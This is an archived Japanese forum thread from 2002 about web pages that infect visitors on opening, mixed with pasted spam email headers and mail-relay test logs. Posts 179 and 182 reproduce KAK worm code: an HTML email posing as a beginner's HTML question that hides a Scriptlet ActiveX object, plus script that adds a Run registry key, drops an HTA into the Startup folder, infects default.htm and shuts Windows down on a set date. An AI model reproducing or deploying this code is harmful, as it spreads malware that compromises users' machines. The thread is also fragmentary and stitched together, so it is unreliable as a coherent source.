開いただけでウイルスに感染するページ

このエントリーをはてなブックマークに追加
164[email protected]
From:Hypnosis < [email protected] >
To: [email protected]
Subject:Give Hypnosis for the Holidays!
Date:***
Received: from [64.37.121.131] by developingdots.com with ESMTP id ***; Mon,***
X-Info:To report abuse forward this mail to [email protected] . Please include all mail header fields!
Message-ID: < [email protected] >
-----
To unsubscribe click here and enter your email address.
If the above link does not work, please copy and paste this address into
your browser window:

http://www.em5000.com/[email protected]
YAHOO!のNEWSからきました!
166 :02/01/05 00:37
ttp://members.fortunecity.com/tqkudo/mose.html

ここってどうですか?
167名無しさん@お腹いっぱい。:02/01/05 02:35
なんかいろんな所で>>155が紹介されてるけど
これってインターネット上にある場合は警告でない?
見ただけでは問題ないと思うけど。
そりゃ保存してローカル権限でみたらまずいだろうけど。
168 :02/01/05 02:50
だから、ネット上には保存してローカル権限で見させるページ作ればいいんじゃんか
169167 :02/01/05 02:54
>>168
それができれば苦労しないが。(何の苦労だか(w
それともなんかローカル権限で見させるセキュリティーホールでも有るの?
170 :02/01/05 13:53
>>169
あふぉ、それくらい自分で作れないなら逝ってよし
171167 :02/01/06 00:13
>>170
だからそれが出来たら大問題でしょ。
古いセキュリティーホール使ってやるって事なら出来ないと一緒。
作れるならどうやって作るか説明してくれ。

俺はせいぜいGetHTMLとかのツールでサイトを丸ごと落とさせるような
サイトを作ってそこに仕込むぐらいの事しか思いつかん。
172名無しさん@お腹いっぱい。:02/01/06 01:42
http://www.top.or.jp/~godhand/a2.html
こんな事やめてくれ。
Received: from mta05-svc.ntlworld.com (62.253.162.45) by *** with SMTP; 00 *** (JST)
Received: from lkgu78guoi ([62.255.154.129]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.23 201-229-121-123-20010418) with SMTP id <30011332240161.MANKO.mta05-svc.ntlworld.com@vkhyify67tdt>; *** +0000
Date:*** From: [email protected]
Message-ID:< [email protected] >
Subject:It's time to STOP just making ends meet!!
-----
ELIMINATE DEBT--(credit cards,car loans, home loans,school loans)
CREATE WEALTH--With IMMEDIATE, EXTRODINARY & RESIDUAL income!
PROTECT ASSETS--Build & preserve a financial foundation!
Would you investigate it??
If you think it's "too good to be true" let me say this....
"A Wise Man Will Investigate What A Fool Takes For Granted!"
and "Timing Beats Out Talent Each and Every Time!"
For INSIDER INFORMATION:
email [email protected]
Name: Email: Country:
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to [email protected] ...Thanks
http://www.em5000.com/[email protected]
http://www.em5000.com/[email protected]
-----
mta05-svc.ntlworld.com
<<< 220 [email protected] ESMTP server (InterMail vM.4.01.03.23 201-229-121-123-20010418) ready ***
>>> HELO rlytest.nanet.co.jp
<<< 250 [email protected]
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] >
<<< 250 Sender <"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected] > Ok
>>> RCPT TO:<[email protected]>
<<< 550 relaying mail to nanet.co.jp is not allowed

netmongol.com (pri=10) (maxleft.com)
<<< 220 X1 NT-ESMTP Server NetMongol.com (IMail 6.06 66407-6)
>>> HELO rlytest.nanet.co.jp
<<< 250 hello NetMongol.com
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from [email protected]
<<< 501 unacceptable mail address
174あぼーん:あぼーん
あぼーん
175ひみつの検疫さん:2024/12/22(日) 22:51:00 ID:MarkedRes
汚染を除去しました。
176ひみつの検疫さん:2024/12/22(日) 22:51:00 ID:MarkedRes
汚染を除去しました。
177ひみつの検疫さん:2024/12/22(日) 22:51:00 ID:MarkedRes
汚染を除去しました。
178ひみつの検疫さん:2024/12/22(日) 22:51:00 ID:MarkedRes
汚染を除去しました。
179[email protected]:02/01/07 03:43

<x-html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>
<DIV><FONT face=Arial size=2>Dear Sir</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>Iam a new learner of HTML . My question , suppose
my main file is "index.html" and I want to go to another file "main.html" with a
password what I have to do , will it require a cgi script to doing so . So
kindly help me by giving the source code for such a html file.</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Thanks</FONT> <BR><BR><FONT face=Arial
size=2>From :</FONT></DIV>
<DIV><FONT face=Arial size=2>name_omitted , India, Jabalpur</FONT></DIV>
<DIV><FONT face=Arial size=2>e-mail : <A
href="mailto:email_address_omitted">email_address_omitted</A> </FONT></DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr
name=Patsisnameit></OBJECT></DIV></FONT></DIV>
<DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr
name=Patsisnameit></OBJECT></DIV>
<SCRIPT><!--
180ひみつの検疫さん:2024/12/22(日) 22:51:00 ID:MarkedRes
汚染を除去しました。
181名無しさん@お腹いっぱい。:02/01/07 03:54
sage
182kakWorm:02/01/07 03:54
;t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft
\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cDays\"=\"C:\\\\\\\\WINDOWS
\\\\\\\\help\\\\\\\\days.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run
(wd+'Regedit.exe -s '+wd+'day.reg');t3=fs.CreateTextFile(wd+'COMMAND\\\\default.htm',1);t3.Write
('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT name=
Patsisnameit id=scr classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC></"+"OBJECT></"+"DIV>')
;t4=fs.OpenTextFile(d2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function Pats()
{return true;}window.onerror=Pats;scr.Reset();scr.doc=\"Z');rs=t4.Read(4192);t4.close();rd=/\\\\/g;re=
/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.
WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path
=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Demarrer\\\\\\\\Programmes\\\\\\\\Demarrage\\\\\\\\day.hta
\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\day.hta\";agt=navigator.
userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf
(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>')
;t3.close();fs.GetFile(wd+'COMMAND\\\\default.htm').Attributes=2;fs.DeleteFile(wd+'day.reg');d=new Date()
;if(d.getDate()==11 && d.getHours()>16){alert('Days It was a day to be a days!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 Scan Memory Driver";la=(navigator.systemLanguage)?navigator.
systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Demarrer\\Programmes\\Demarrage\\day.hta":
"C:\\windows\\Start Menu\\Programs\\StartUp\\day.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)
&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>

</x-html>
183ウイルス:02/01/07 06:03
このスレをカチューシャでみたらNIS2002
がログをウイルスと断定、削除しました